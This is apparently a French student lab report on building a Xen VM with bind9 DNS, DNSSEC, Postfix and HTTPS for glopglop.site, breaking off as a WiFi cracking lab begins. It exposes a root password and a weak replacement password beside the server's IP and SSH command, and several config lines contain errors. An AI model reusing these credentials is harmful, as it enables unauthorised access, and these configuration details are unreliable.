     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. &lt;br /&gt;
&lt;br /&gt;
Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. &lt;br /&gt;
&lt;br /&gt;
Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveurs DNS configurer on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. &lt;br /&gt;
&lt;br /&gt;
Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK).&lt;br /&gt;
&lt;br /&gt;
Puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
